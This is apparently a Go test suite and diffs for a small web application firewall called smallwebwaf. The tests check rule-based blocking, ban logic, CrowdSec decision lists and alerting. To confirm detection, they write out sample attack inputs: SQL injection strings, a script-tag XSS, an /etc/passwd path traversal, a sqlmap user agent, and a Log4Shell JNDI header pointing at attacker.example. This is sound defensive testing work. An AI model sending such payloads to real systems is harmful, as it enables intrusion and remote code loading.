// wantWAF checks the request log line's waf_rule_ids and waf_score, and
// that it has duration_waf, or with no score, that it has none of the
// three: the Core Rule Set did not inspect the request.
func wantWAF(t *testing.T, line logLine, score *int, ruleIDs ...int) {
t.Helper()
if !slices.Equal(line.WAFRuleIDs, ruleIDs) {
t.Errorf("log line has waf_rule_ids %v, want %v", line.WAFRuleIDs, ruleIDs)
}
switch {
case score == nil && (line.WAFScore != nil || line.DurationWAF != nil):
t.Errorf("log line has waf_score %v and duration_waf %v, want neither",
line.fields["waf_score"], line.fields["duration_waf"])
case score != nil && (line.WAFScore == nil || *line.WAFScore != *score):
t.Errorf("log line has waf_score %v, want %d", line.fields["waf_score"], *score)
case score != nil && line.DurationWAF == nil:
t.Error("log line has no duration_waf")
}
}
func TestCoreRuleSetRefusesAttacksInBlockModeAndOnlyLogsThemInDetectMode(t *testing.T) {
t.Parallel()
for _, attack := range []struct {
name, path, header string
ruleIDs []int
score int
}{
{"SQL injection in the query", sqlInjection, "", []int{942100}, 5},
{
"script in the query", "/?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E", "",
[]int{941100, 941110, 941160, 941390}, 20,
},
{
"path traversal in the path", "/files/../../etc/passwd", "",
[]int{930100, 930110}, 10,
},
{
"Log4Shell in a header", "/", "X-Api-Version: ${jndi:ldap://attacker.example/a}",
[]int{944150}, 5,
},
{"scanner's user agent", "/", "User-Agent: sqlmap/1.7", []int{913100}, 5},
{
// Coraza keeps the first 1000 query parameters.
"SQL injection after 1000 query parameters",
"/?" + strings.Repeat("a=1&", 1000) + "id=1'%20OR%20'1'='1", "",
[]int{900300}, 5,
},
} {
t.Run(attack.name, func(t *testing.T) {
t.Parallel()
for _, tc := range []struct {
mode, action string
status int
}{
{block, requestlog.ActionWAFBlocked, http.StatusForbidden},
{detect, requestlog.ActionForward, http.StatusOK},
} {
s, _, _ := startWithClock(t, "", map[string]string{wafMode: tc.mode})
line, _ := s.requestWithHeader(client, attack.path, attack.header,
tc.status, tc.action)
wantWAF(t, line, &attack.score, attack.ruleIDs...)
}
})
}
}
func TestOrdinaryRequestIsInspectedAndPassed(t *testing.T) {
t.Parallel()
s, _, _ := startWithClock(t, "", map[string]string{wafMode: block})
line := s.request(client, "/owner/repo/src/branch/main/README.md?display=source",
http.StatusOK, requestlog.ActionForward)
wantWAF(t, line, new(0))
}
func TestCoreRuleSetIsNotRunWhenOffOrForAnExemptClientPathOrRuleFileRefusal(
t *testing.T,
) {
t.Parallel()
const allowed = "192.0.2.60" // in SWWAF_ALLOW_NETS
s, _, _ := startWithClock(t, "", map[string]string{
wafMode: block,
wafExemptPaths: "/api/",
allowNets: allowed,
rulesDir: writeRules(t, testRules),
})
// A client in SWWAF_ALLOW_NETS, and a path SWWAF_WAF_EXEMPT_PATHS
// exempts, are not inspected.
line := s.request(allowed, sqlInjection, http.StatusOK, requestlog.ActionForward)
wantWAF(t, line, nil)
line = s.request(client, "/api/v1/repos?id=1'%20OR%20'1'='1", http.StatusOK,
requestlog.ActionForward)
wantWAF(t, line, nil)
// The prefix is matched as rate limit exempt paths are: a path that
// goes up and out of it is inspected.
line = s.request(client, "/api/../?id=1'%20OR%20'1'='1", http.StatusForbidden,
requestlog.ActionWAFBlocked)
wantWAF(t, line, new(25), 930100, 930110, 942100)
// A request a rule file refuses is not inspected.
line = s.request(otherClient, "/blocked?id=1'%20OR%20'1'='1", http.StatusForbidden,
requestlog.ActionRuleBlocked)
wantWAF(t, line, nil)
// With SWWAF_WAF_MODE off, no request is.
s, _, _ = startWithClock(t, "", map[string]string{wafMode: off})
line = s.request(client, sqlInjection, http.StatusOK, requestlog.ActionForward)
wantWAF(t, line, nil)
}
func TestAnomalyThreshold(t *testing.T) {
t.Parallel()
// A score under the threshold, or with the threshold off, is logged,
// and refuses nothing.
for _, threshold := range []string{"6", off} {
s, _, _ := startWithClock(t, "", map[string]string{
wafMode: block, wafAnomalyThreshold: threshold,
})
line := s.request(client, sqlInjection, http.StatusOK, requestlog.ActionForward)
wantWAF(t, line, new(5), 942100)
}
s, _, _ := startWithClock(t, "", map[string]string{
wafMode: block, wafAnomalyThreshold: "5",
})
s.request(client, sqlInjection, http.StatusForbidden, requestlog.ActionWAFBlocked)
}
func TestDisabledRulesSwitchOffWhatGiteaWouldBeRefused(t *testing.T) {
t.Parallel()
for _, request := range []struct {
name, method, path, header string
// ruleIDs are the rules that match the request with none
// switched off.
ruleIDs []int
}{
{
"git push", http.MethodPost, "/owner/repo.git/git-receive-pack",
"Content-Type: application/x-git-receive-pack-request\r\nContent-Length: 4",
[]int{920420, 930130},
},
{
"package upload without a type", http.MethodPut,
"/api/packages/owner/generic/tool/1.0/tool.tar.gz", "Content-Length: 4",
[]int{920340},
},
{
"a shell script", http.MethodGet, "/owner/repo/raw/branch/main/install.sh", "",
[]int{920440},
},
{
"an editor's settings", http.MethodGet,
"/owner/repo/src/branch/main/.zed/settings.json", "", []int{930140},
},
} {
t.Run(request.name, func(t *testing.T) {
t.Parallel()
body := ""
if request.method != http.MethodGet {
body = "push"
}
// By default, the rules are switched off.
s, _, _ := startWithClock(t, "", map[string]string{wafMode: block})
line, _ := s.requestWithBody(request.method, client, request.path,
request.header, body, http.StatusOK, requestlog.ActionForward)
wantWAF(t, line, new(0))
// A list given replaces the default.
s, _, _ = startWithClock(t, "", map[string]string{
wafMode: block, wafDisabledRules: "942100",
})
score := 5 * len(request.ruleIDs)
line, _ = s.requestWithBody(request.method, client, request.path,
request.header, body, http.StatusForbidden, requestlog.ActionWAFBlocked)
wantWAF(t, line, &score, request.ruleIDs...)
// And switches off the rules it lists.
line = s.request(client, sqlInjection, http.StatusOK, requestlog.ActionForward)
wantWAF(t, line, new(0))
})
}
}
func TestAttackInAFormBodyIsRefusedOnlyWhileBodiesAreRead(t *testing.T) {
t.Parallel()
const body = "id=1'%20OR%20'1'='1"
header := "Content-Type: " + formData + "\r\nContent-Length: " +
strconv.Itoa(len(body))
s, _, _ := startWithClock(t, "", map[string]string{wafMode: block})
line, _ := s.requestWithBody(http.MethodPost, client, "/", header, body,
http.StatusOK, requestlog.ActionForward)
wantWAF(t, line, new(0))
s, _, _ = startWithClock(t, "", map[string]string{
wafMode: block, wafBodyLimit: sizeLimitSetting,
})
line, _ = s.requestWithBody(http.MethodPost, client, "/", header, body,
http.StatusForbidden, requestlog.ActionWAFBlocked)
wantWAF(t, line, new(5), 942100)
}
func TestBodiesReachTheAppAsSentWhileBodiesAreRead(t *testing.T) {
t.Parallel()
// The app answers with the body it was sent, once it has the whole of
// it: Go's server reads no more of a body once the answer has begun.
app := startApp(t, func(w http.ResponseWriter, r *http.Request) {
body, _ := io.ReadAll(r.Body)
_, _ = w.Write(body)
})
addr, out := startProxy(t, app.URL, map[string]string{
wafMode: block, wafBodyLimit: sizeLimitSetting,
})
longer := "a=" + strings.Repeat("b", 64*sizeLimit)
for i, tc := range []struct {
name, contentType, body string
// announced sends the body's length in Content-Length; otherwise
// the body is sent in chunks with no length given.
announced bool
}{
{"form data within the limit", formData, "a=b", true},
{"form data longer than the limit", formData, longer, true},
{"form data longer than the limit, not announced", formData, longer, false},
{
"JSON larger than the limit", "application/json",
`{"a":"` + strings.Repeat("b", 2*sizeLimit) + `"}`, true,
},
{
"a binary body", "application/octet-stream",
strings.Repeat("\x00\xff", sizeLimit), true,
},
} {
// A reader whose length the client cannot tell is sent in chunks.
var body io.Reader = strings.NewReader(tc.body)
if !tc.announced {
body = io.MultiReader(body)
}
req := newRequest(t, http.MethodPost, addr, "/", body)
req.Header.Set("Content-Type", tc.contentType)
got := do(t, req)
if got.status != http.StatusOK || string(got.body) != tc.body {
t.Errorf("%s: the app got %d bytes, answered %d, want the %d sent, 200",
tc.name, len(got.body), got.status, len(tc.body))
}
line := out.requestLines(t, i+1)[i]
wantLine(t, line, http.StatusOK, requestlog.ActionForward)
if line.RequestBytes != int64(len(tc.body)) {
t.Errorf("%s: log line has request_bytes %d, want %d", tc.name,
line.RequestBytes, len(tc.body))
}
}
}
func TestFormBodyLongerThanTheLimitStreamsOnToTheApp(t *testing.T) {
t.Parallel()
const (
first = "a=" // and twice the limit of b's, then the rest
rest = 64 * sizeLimit
)
// past is closed once the app has received twice what the Core Rule
// Set reads, and got is the length of the whole body it received.
past := make(chan struct{})
got := make(chan int64, 1)
app := startApp(t, func(_ http.ResponseWriter, r *http.Request) {
n, _ := io.CopyN(io.Discard, r.Body, 2*sizeLimit)
close(past)
m, _ := io.Copy(io.Discard, r.Body)
got <- n + m
})
addr, out := startProxy(t, app.URL, map[string]string{
wafMode: block, wafBodyLimit: sizeLimitSetting,
})
// The client sends the rest only once the app has received the first
// part: were smallwebwaf to hold the body until the end, it would
// never come.
body, sender := io.Pipe()
go func() {
_, _ = io.WriteString(sender, first+strings.Repeat("b", 2*sizeLimit))
select {
case <-past:
case <-time.After(waitLimit):
t.Error("the app got no more than the Core Rule Set reads " +
"before the whole body was sent")
_ = sender.CloseWithError(io.ErrUnexpectedEOF)
return
}
_, _ = io.WriteString(sender, strings.Repeat("b", rest))
_ = sender.Close()
}()
req := newRequest(t, http.MethodPost, addr, "/", body)
req.Header.Set("Content-Type", formData)
wantStatus(t, do(t, req), http.StatusOK)
want := int64(len(first) + 2*sizeLimit + rest)
if n := <-got; n != want {
t.Errorf("the app got %d bytes, want %d", n, want)
}
wantLine(t, out.requestLine(t), http.StatusOK, requestlog.ActionForward)
}
func TestClientTooSlowToSendWhatTheCoreRuleSetReads(t *testing.T) {
t.Parallel()
app := startApp(t, func(http.ResponseWriter, *http.Request) {})
addr, out := startProxy(t, app.URL, map[string]string{
wafMode: block, wafBodyLimit: sizeLimitSetting,
clientRequestTimeout: shortTimeoutSetting, metricsToken: token,
})
conn := dial(t, addr)
send(t, conn, "POST /comment HTTP/1.1\r\nHost: app\r\nContent-Type: "+formData+
"\r\nContent-Length: 100\r\n\r\ncontent=the first bytes")
wantStatus(t, readResponse(t, conn), http.StatusRequestTimeout)
line := out.requestLine(t)
wantLine(t, line, http.StatusRequestTimeout, requestlog.ActionTimedOut)
wantNotSentToTheApp(t, line)
wantLimitHits(t, addr, clientRequestTimeout, 1)
}
func TestBodyOverTheSizeLimitWhileTheCoreRuleSetReadsIt(t *testing.T) {
t.Parallel()
app := startApp(t, func(http.ResponseWriter, *http.Request) {})
addr, out := startProxy(t, app.URL, map[string]string{
wafMode: block, wafBodyLimit: "4K",
requestMaxBytes: sizeLimitSetting, metricsToken: token,
})
// Sent in chunks, its length is not announced, and is found to be over
// the limit as the Core Rule Set reads it.
body := io.MultiReader(strings.NewReader("a=" + strings.Repeat("b", 2*sizeLimit)))
req := newRequest(t, http.MethodPost, addr, "/", body)
req.Header.Set("Content-Type", formData)
wantStatus(t, do(t, req), http.StatusRequestEntityTooLarge)
line := out.requestLine(t)
wantLine(t, line, http.StatusRequestEntityTooLarge, requestlog.ActionTooLarge)
wantNotSentToTheApp(t, line)
wantLimitHits(t, addr, requestMaxBytes, 1)
}
// wantNotSentToTheApp checks that the request of line was not sent to the
// app at all.
func wantNotSentToTheApp(t *testing.T, line logLine) {
t.Helper()
_, sent := line.fields["duration_upstream_total"]
if sent {
t.Error("log line has duration_upstream_total, for a request sent to the app")
}
}
func TestResponsesAreNotInspected(t *testing.T) {
t.Parallel()
// A raw shell script, and an SQL error, which the Core Rule Set's rules
// for responses take for a leak.
const page = "#!/bin/sh\nrm -rf /tmp/build\n" +
"You have an error in your SQL syntax; check the manual that " +
"corresponds to your MySQL server version\n"
app := startApp(t, func(w http.ResponseWriter, _ *http.Request) {
_, _ = w.Write([]byte(page))
})
addr, out := startProxy(t, app.URL, map[string]string{wafMode: block})
got := get(t, addr, "/owner/repo/raw/branch/main/build.sh")
if got.status != http.StatusOK || string(got.body) != page {
t.Errorf("answered %d with %q, want 200 with the app's page", got.status, got.body)
}
wantLine(t, out.requestLine(t), http.StatusOK, requestlog.ActionForward)
}
func TestCoreRuleSetRefusalIsAnOffenceAndCountsTowardTheErrorBurst(t *testing.T) {
t.Parallel()
const scraper = "192.0.2.200"
s, _, server := startWithClock(t, "", map[string]string{
wafMode: block, errorBurstThreshold: "2", metricsToken: token,
})
for range 2 {
s.request(client, sqlInjection, http.StatusForbidden, requestlog.ActionWAFBlocked)
}
// The third refusal in a minute breaks the error burst, and bans the
// client.
line := s.request(client, sqlInjection, http.StatusForbidden,
requestlog.ActionWAFBlocked)
if line.LimitHit != requestlog.LimitHitErrorBurst ||
line.Offence != requestlog.OffenceLimit {
t.Errorf("log line has limit_hit %q and offence %q, want error_burst and limit",
line.LimitHit, line.Offence)
}
s.get(client, http.StatusForbidden, requestlog.ActionBanned)
want := ratelimit.Offences{Limit: 1, WAFBlocked: 3}
if offences := historyOf(t, server, client).Offences; offences != want {
t.Errorf("history counts the offences %+v, want %+v", offences, want)
}
metrics := s.scrape(scraper)
wantMetric(t, metrics,
`smallwebwaf_waf_matches_total{instance="app",mode="block",rule_id="942100"}`, 3)
wantMetric(t, metrics,
`smallwebwaf_offences_total{instance="app",kind="waf_blocked"}`, 3)
wantMetric(t, metrics, `smallwebwaf_requests_total{action="waf_blocked",`+
`instance="app",status_class="4xx"}`, 3)
}
func TestDetectModeMatchIsNoOffenceAndNotCountedTowardTheErrorBurst(t *testing.T) {
t.Parallel()
const scraper = "192.0.2.200"
s, _, server := startWithClock(t, "", map[string]string{
wafMode: detect, errorBurstThreshold: "2", metricsToken: token,
})
for range 3 {
s.request(client, sqlInjection, http.StatusOK, requestlog.ActionForward)
}
s.get(client, http.StatusOK, requestlog.ActionForward)
offences := historyOf(t, server, client).Offences
if offences != (ratelimit.Offences{}) {
t.Errorf("history counts the offences %+v, want none", offences)
}
metrics := s.scrape(scraper)
wantMetric(t, metrics,
`smallwebwaf_waf_matches_total{instance="app",mode="detect",rule_id="942100"}`, 3)
wantNoSeries(t, metrics,
`smallwebwaf_offences_total{instance="app",kind="waf_blocked"}`)
}
func TestObserveModeLogsWhatTheCoreRuleSetWouldDo(t *testing.T) {
t.Parallel()
s, _, server := startWithClock(t, "", map[string]string{wafMode: block, mode: observe})
line := s.request(client, sqlInjection, http.StatusOK, requestlog.ActionForward)
wantWouldAction(t, line, requestlog.ActionWAFBlocked)
wantWAF(t, line, new(5), 942100)
// It is an offence as in enforce mode.
want := ratelimit.Offences{WAFBlocked: 1}
if offences := historyOf(t, server, client).Offences; offences != want {
t.Errorf("history counts the offences %+v, want %+v", offences, want)
}
}
func TestCoreRuleSetMatchRaisesTheWAFBlockAlert(t *testing.T) {
t.Parallel()
for _, tc := range []struct {
name string
env map[string]string
// status and action are what the request is answered and logged
// with, and alertMode what the alert's detail gives as mode, if
// anything.
status int
action, alertMode string
}{
{
"block", map[string]string{wafMode: block},
http.StatusForbidden, requestlog.ActionWAFBlocked, "",
},
{
"detect", map[string]string{wafMode: detect},
http.StatusOK, requestlog.ActionForward, detect,
},
{
"block in observe mode", map[string]string{wafMode: block, mode: observe},
http.StatusOK, requestlog.ActionForward, observe,
},
} {
t.Run(tc.name, func(t *testing.T) {
t.Parallel()
s, clk, _, queue := startWithAlerts(t, tc.env)
// The second is a repeat, which the cooldown holds back, and an
// ordinary request raises none.
for range 2 {
s.request(client, sqlInjection, tc.status, tc.action)
}
s.get(client, http.StatusOK, requestlog.ActionForward)
detail := map[string]any{
"rule_ids": []int{942100}, "score": 5, "method": http.MethodGet,
"path": sqlInjection,
}
if tc.alertMode != "" {
detail["mode"] = tc.alertMode
}
wantAlerts(t, queue, alerts.Alert{
Instance: alertInstance,
Time: clk.Now(),
Event: alerts.EventWAFBlock,
Client: netip.MustParseAddr(client),
Netblock: netip.MustParsePrefix(client + "/32"),
Reason: "scored by the Core Rule Set at or over SWWAF_WAF_ANOMALY_THRESHOLD",
Detail: detail,
})
if queue.Suppressed() != 1 {
t.Errorf("%d alerts held back, want the repeat", queue.Suppressed())
}
})
}
}
+9 -3
View File
@@ -52,7 +52,7 @@ func TestCountryLists(t *testing.T) {
calls.Add(1) calls.Add(1)
}) })
geojsURL, _ := startGeoJS(t) geojsURL, _ := startGeoJS(t)
env := map[string]string{trustedProxies: trustLocalhost} env := map[string]string{trustedProxies: trustLocalhost, lookupTimeout: "1h"}
maps.Copy(env, tc.env) maps.Copy(env, tc.env)
addr, out := startProxyWithGeoJS(t, app.URL, geojsURL, env) addr, out := startProxyWithGeoJS(t, app.URL, geojsURL, env)
@@ -101,6 +101,7 @@ func TestCountryRefusalComesBeforeTheBody(t *testing.T) {
geojsURL, _ := startGeoJS(t) geojsURL, _ := startGeoJS(t)
addr, out := startProxyWithGeoJS(t, app.URL, geojsURL, map[string]string{ addr, out := startProxyWithGeoJS(t, app.URL, geojsURL, map[string]string{
trustedProxies: trustLocalhost, trustedProxies: trustLocalhost,
lookupTimeout: "1h",
deniedCountries: "kp", deniedCountries: "kp",
}) })
@@ -147,6 +148,7 @@ func TestRequestRefusedByCountryIsNotCounted(t *testing.T) {
app := startApp(t, func(http.ResponseWriter, *http.Request) {}) app := startApp(t, func(http.ResponseWriter, *http.Request) {})
addr, _ := startProxyWithGeoJS(t, app.URL, geojs.URL, map[string]string{ addr, _ := startProxyWithGeoJS(t, app.URL, geojs.URL, map[string]string{
trustedProxies: trustLocalhost, trustedProxies: trustLocalhost,
lookupTimeout: "1h",
allowedCountries: "de", allowedCountries: "de",
rateLimitPerMinute: "1", rateLimitPerMinute: "1",
}) })
@@ -194,7 +196,7 @@ func TestPrivateAddressIsNeverLookedUp(t *testing.T) {
app := startApp(t, func(http.ResponseWriter, *http.Request) {}) app := startApp(t, func(http.ResponseWriter, *http.Request) {})
geojsURL, asked := startGeoJS(t) geojsURL, asked := startGeoJS(t)
env := map[string]string{trustedProxies: trustLocalhost} env := map[string]string{trustedProxies: trustLocalhost, lookupTimeout: "1h"}
maps.Copy(env, tc.env) maps.Copy(env, tc.env)
addr, out := startProxyWithGeoJS(t, app.URL, geojsURL, env) addr, out := startProxyWithGeoJS(t, app.URL, geojsURL, env)
@@ -280,7 +282,11 @@ func TestExclusiveListRefusesAPrivateAddressUnlessAllowed(t *testing.T) {
// startGeoJS starts a stand-in for GeoJS, which places fromDE and fromKP, // startGeoJS starts a stand-in for GeoJS, which places fromDE and fromKP,
// each in an AS of its own, and no other address. It returns its URL, and // each in an AS of its own, and no other address. It returns its URL, and
// what returns the addresses it has been asked about. // what returns the addresses it has been asked about. A test that needs
// the stand-in to be asked or to answer sets SWWAF_LOOKUP_TIMEOUT to an
// hour, whether or not a request waits for the answer: on the default
// second, a hold-up of the test process can abandon the request to the
// stand-in, and leave the client unknown.
func startGeoJS(t *testing.T) (string, func() []string) { func startGeoJS(t *testing.T) (string, func() []string) {
t.Helper() t.Helper()
+181
View File
@@ -0,0 +1,181 @@
package proxy_test
import (
"net/http"
"net/netip"
"reflect"
"testing"
"time"
"sneak.berlin/go/smallwebwaf/internal/alerts"
"sneak.berlin/go/smallwebwaf/internal/bans"
"sneak.berlin/go/smallwebwaf/internal/proxy"
"sneak.berlin/go/smallwebwaf/internal/reputation"
"sneak.berlin/go/smallwebwaf/internal/requestlog"
)
// The CrowdSec settings, and the tests' engine, which is never asked: each
// test puts in the copy of its decision list, at decisionsURL, that it
// needs, as reputation.json would at start.
const (
crowdSecURL = "SWWAF_CROWDSEC_LAPI_URL"
crowdSecKey = "SWWAF_CROWDSEC_LAPI_KEY"
lapi = "http://crowdsec.example:8080"
decisionsURL = lapi + "/v1/decisions"
bouncerKey = "crowdsec-key-0123456789abcdef"
)
func TestClientTheCrowdSecDecisionListListsIsBannedUntilTheDecisionEnds(t *testing.T) {
t.Parallel()
s, clk, server, queue := startWithAlerts(t, map[string]string{
crowdSecURL: lapi, crowdSecKey: bouncerKey, metricsToken: token,
})
// client had four hours left on its decision as the engine answered.
fetched := clk.Now()
loadDecisions(t, server, fetched, `[{"duration": "4h0m0s", `+
`"scenario": "crowdsecurity/ssh-bf", "scope": "Ip", "type": "ban", `+
`"value": "`+client+`"}]`)
expires := requestlog.FormatTime(fetched.Add(4 * time.Hour))
// Its first request is refused, and bans it until the decision ends.
line := s.get(client, http.StatusForbidden, requestlog.ActionBanned)
wantReputation(t, line, decisionsURL)
if line.BanExpires != expires {
t.Errorf("log line has ban_expires %q, want %s", line.BanExpires, expires)
}
listed := []bans.ReputationHit{{Source: decisionsURL}}
held := server.Ledger.Bans(netip.MustParsePrefix(client + "/32"))
if len(held) != 1 || held[0].Cause != bans.CauseCrowdSec ||
!held[0].Start.Equal(fetched) || !held[0].Expires.Equal(fetched.Add(4*time.Hour)) ||
held[0].Reason != "CrowdSec's decision for crowdsecurity/ssh-bf" ||
!reflect.DeepEqual(held[0].Notes.Reputation, listed) ||
held[0].Notes.Request.Path != "/" || held[0].Notes.Requests != 1 {
t.Fatalf("bans %+v, want one for crowdsec of four hours, with the list and "+
"the request in its notes", held)
}
// The listing raises a reputation_hit alert, and the ban its own.
waiting := queue.Snapshot().Waiting[alerts.DestinationWebhook]
if len(waiting) != 2 || waiting[0].Event != alerts.EventReputationHit ||
waiting[0].Reason != "listed by the CrowdSec decision list" ||
!reflect.DeepEqual(waiting[1], banAlert(alerts.EventBan, fetched, client, held[0],
expires)) {
t.Errorf("alerts waiting %+v, want a reputation_hit alert, then the ban's",
waiting)
}
// Each request while the ban lasts is refused under it, as under any
// ban, and once it has ended the client is let through.
clk.advance(4*time.Hour - time.Second)
line = s.get(client, http.StatusForbidden, requestlog.ActionBanned)
wantReputation(t, line)
if line.BanExpires != expires {
t.Errorf("log line has ban_expires %q, want %s", line.BanExpires, expires)
}
clk.advance(time.Second)
s.get(client, http.StatusOK, requestlog.ActionForward)
// The ban and the hit are counted, and the list has the metrics of any
// list fetched from a URL.
metrics := s.scrape(unplaced)
labels := `{instance="` + alertInstance + `",source="` + decisionsURL + `"}`
wantMetric(t, metrics, `smallwebwaf_bans_made_total{cause="crowdsec",`+
`instance="`+alertInstance+`"}`, 1)
wantMetric(t, metrics, "smallwebwaf_reputation_hits_total"+labels, 1)
wantMetric(t, metrics, "smallwebwaf_reputation_failures_total"+labels, 0)
wantMetric(t, metrics, "smallwebwaf_reputation_last_fetch_timestamp_seconds"+labels,
float64(fetched.Unix()))
}
func TestEndedCrowdSecDecisionNoLongerBansThoughTheCopyStillHoldsIt(t *testing.T) {
t.Parallel()
s, clk, server := startWithClock(t, "", map[string]string{
crowdSecURL: lapi, crowdSecKey: bouncerKey,
})
// 198.51.100.0/24 and 2001:db8::9 had a minute left as the engine
// answered.
fetched := clk.Now()
loadDecisions(t, server, fetched, `[{"duration": "1m0s", `+
`"scenario": "crowdsecurity/http-probing", "scope": "Range", "type": "ban", `+
`"value": "198.51.100.0/24"}, {"duration": "1m0s", `+
`"scenario": "crowdsecurity/http-probing", "scope": "Ip", "type": "ban", `+
`"value": "2001:db8::9"}]`)
// Just before its end, the decision bans a client in the netblock, and
// one on an IPv6 address bans the address's group, the /64.
clk.advance(time.Minute - time.Nanosecond)
s.get("198.51.100.7", http.StatusForbidden, requestlog.ActionBanned)
s.get("2001:db8::9", http.StatusForbidden, requestlog.ActionBanned)
s.get("2001:db8::5", http.StatusForbidden, requestlog.ActionBanned)
// Once it has ended, it bans no other client, and the bans it made end
// with it.
clk.advance(time.Nanosecond)
for _, from := range []string{"198.51.100.8", "198.51.100.7", "2001:db8::5"} {
wantReputation(t, s.get(from, http.StatusOK, requestlog.ActionForward))
}
if made := server.Ledger.Made(bans.CauseCrowdSec); made != 2 {
t.Errorf("%d bans made for crowdsec, want 2, on 198.51.100.7/32 and "+
"2001:db8::/64", made)
}
if held := server.Ledger.Bans(netip.MustParsePrefix("2001:db8::/64")); len(held) != 1 {
t.Errorf("bans of 2001:db8::/64 %+v, want one", held)
}
}
func TestObserveModeForwardsAClientTheCrowdSecDecisionListListsAndAlertsTheBan(
t *testing.T,
) {
t.Parallel()
s, clk, server, queue := startWithAlerts(t, map[string]string{
crowdSecURL: lapi, crowdSecKey: bouncerKey, mode: observe,
})
loadDecisions(t, server, clk.Now(), `[{"duration": "4h0m0s", `+
`"scenario": "crowdsecurity/ssh-bf", "scope": "Ip", "type": "ban", `+
`"value": "`+client+`"}]`)
line := s.get(client, http.StatusOK, requestlog.ActionForward)
wantWouldAction(t, line, requestlog.ActionBanned)
wantReputation(t, line, decisionsURL)
if held := server.Ledger.Snapshot(); len(held) != 0 {
t.Errorf("bans %+v, want none", held)
}
waiting := queue.Snapshot().Waiting[alerts.DestinationWebhook]
if len(waiting) != 2 || waiting[1].Event != alerts.EventBan ||
waiting[1].Detail["cause"] != bans.CauseCrowdSec ||
waiting[1].Detail["mode"] != observe {
t.Errorf("alerts waiting %+v, want a reputation_hit alert, then the ban alert "+
"marked observe", waiting)
}
}
// loadDecisions puts into server's lists the copy of the decision list at
// decisionsURL, answer, the engine's answer, fetched at fetched, as
// reputation.json would at start.
func loadDecisions(
t *testing.T, server *proxy.Server, fetched time.Time, answer string,
) {
t.Helper()
err := server.Lists.Load([]reputation.List{{
URL: decisionsURL, Tried: fetched, Fetched: fetched, Lines: []string{answer},
}})
if err != nil {
t.Fatalf("load the decision list: %v", err)
}
}
+395
View File
@@ -0,0 +1,395 @@
package proxy_test
import (
"maps"
"net/http"
"net/netip"
"reflect"
"testing"
"time"
"sneak.berlin/go/smallwebwaf/internal/alerts"
"sneak.berlin/go/smallwebwaf/internal/bans"
"sneak.berlin/go/smallwebwaf/internal/proxy"
"sneak.berlin/go/smallwebwaf/internal/ratelimit"
"sneak.berlin/go/smallwebwaf/internal/requestlog"
)
const errorBurstThreshold = "SWWAF_ERROR_BURST_THRESHOLD"
// refused is a request the tests here send, which smallwebwaf refuses
// after a rule file match, or for a missing or wrong token.
type refused int
const (
// blockRule is a request testRules' block rule refuses with 403.
blockRule refused = iota
// banRule is one its ban rule refuses with 403, and bans the client
// for.
banRule
// noMetricsToken is one for the metrics without a token, and
// wrongAdminToken one for the bans with the metrics token, each
// refused with 401.
noMetricsToken
wrongAdminToken
)
// send sends r from the client at from, checks its answer and log line as
// sender.request does, and returns the line.
func (r refused) send(s *sender, from string) logLine {
s.t.Helper()
switch r {
case blockRule:
return s.request(from, blockedPath, http.StatusForbidden,
requestlog.ActionRuleBlocked)
case banRule:
return s.request(from, probePath, http.StatusForbidden, requestlog.ActionBanned)
case noMetricsToken:
return s.request(from, proxy.MetricsPath, http.StatusUnauthorized,
requestlog.ActionAdmin)
case wrongAdminToken:
line, _ := s.requestWithHeader(from, proxy.BansPath, "Authorization: "+bearer,
http.StatusUnauthorized, requestlog.ActionAdmin)
return line
}
s.t.Fatalf("no request for the refusal %d", r)
return logLine{}
}
// startForErrorBurst is startWithClock with testRules, both tokens and
// SWWAF_ERROR_BURST_THRESHOLD at threshold, and the settings in env.
func startForErrorBurst(
t *testing.T, threshold string, env map[string]string,
) (*sender, *clock, *proxy.Server) {
t.Helper()
settings := map[string]string{
errorBurstThreshold: threshold,
rulesDir: writeRules(t, testRules),
adminToken: adminSecret,
metricsToken: token,
}
maps.Copy(settings, env)
return startWithClock(t, "", settings)
}
func TestErrorBurstBreaksAtOneOverTheThreshold(t *testing.T) {
t.Parallel()
for _, tc := range []struct {
name string
// refusals are four, one over the threshold of three.
refusals []refused
}{
{"block rule", []refused{blockRule, blockRule, blockRule, blockRule}},
{
"missing or wrong token",
[]refused{noMetricsToken, wrongAdminToken, noMetricsToken, wrongAdminToken},
},
{
"a mix ending in a ban rule",
[]refused{blockRule, noMetricsToken, blockRule, banRule},
},
} {
t.Run(tc.name, func(t *testing.T) {
t.Parallel()
s, _, _ := startForErrorBurst(t, "3", nil)
// Three refusals break nothing, and the app's answers between
// them are not counted.
for i, r := range tc.refusals[:3] {
line := r.send(s, client)
if line.LimitHit != "" || line.Offence != "" {
t.Errorf("refusal %d: log line has limit_hit %q and offence %q, "+
"want none", i+1, line.LimitHit, line.Offence)
}
s.get(client, http.StatusOK, requestlog.ActionForward)
}
// The fourth is answered as the others were, breaks the error
// burst, and bans the client.
line := tc.refusals[3].send(s, client)
if line.LimitHit != requestlog.LimitHitErrorBurst ||
line.Offence != requestlog.OffenceLimit {
t.Errorf("log line has limit_hit %q and offence %q, want error_burst "+
"and limit", line.LimitHit, line.Offence)
}
s.get(client, http.StatusForbidden, requestlog.ActionBanned)
})
}
}
func TestErrorBurstBanNotesHistoryAndMetrics(t *testing.T) {
t.Parallel()
const scraper = "192.0.2.200"
s, clk, server := startForErrorBurst(t, "2", nil)
start := clk.Now()
blockRule.send(s, client)
wrongAdminToken.send(s, client)
line := blockRule.send(s, client)
expires := start.Add(time.Hour)
if line.BanExpires != requestlog.FormatTime(expires) {
t.Errorf("log line has ban_expires %q, want an hour on", line.BanExpires)
}
netblock := netip.MustParsePrefix(client + "/32")
want := bans.Ban{
Netblock: netblock,
Start: start,
Expires: expires,
Cause: bans.CauseLimit,
Reason: "refusals per minute over the limit of 2",
Notes: bans.Notes{
Kind: ratelimit.KindRefusals,
Limit: 2,
Window: minute,
Count: 3,
Request: bans.Request{
Time: start,
Method: http.MethodGet,
Host: appHost,
Path: blockedPath,
Status: http.StatusForbidden,
UserAgent: userAgent,
},
Requests: 3,
},
}
got := server.Ledger.Bans(netblock)
if len(got) != 1 || !reflect.DeepEqual(got[0], want) {
t.Fatalf("bans\n%+v\nwant\n%+v", got, want)
}
wantOffences := ratelimit.Offences{Limit: 1, RuleBlocked: 2, TokenRefused: 1}
if offences := historyOf(t, server, client).Offences; offences != wantOffences {
t.Errorf("history counts the offences %+v, want %+v", offences, wantOffences)
}
metrics := s.scrape(scraper)
wantMetric(t, metrics, `smallwebwaf_rate_limit_hits_total{instance="app",`+
`kind="refusals",window="minute"}`, 1)
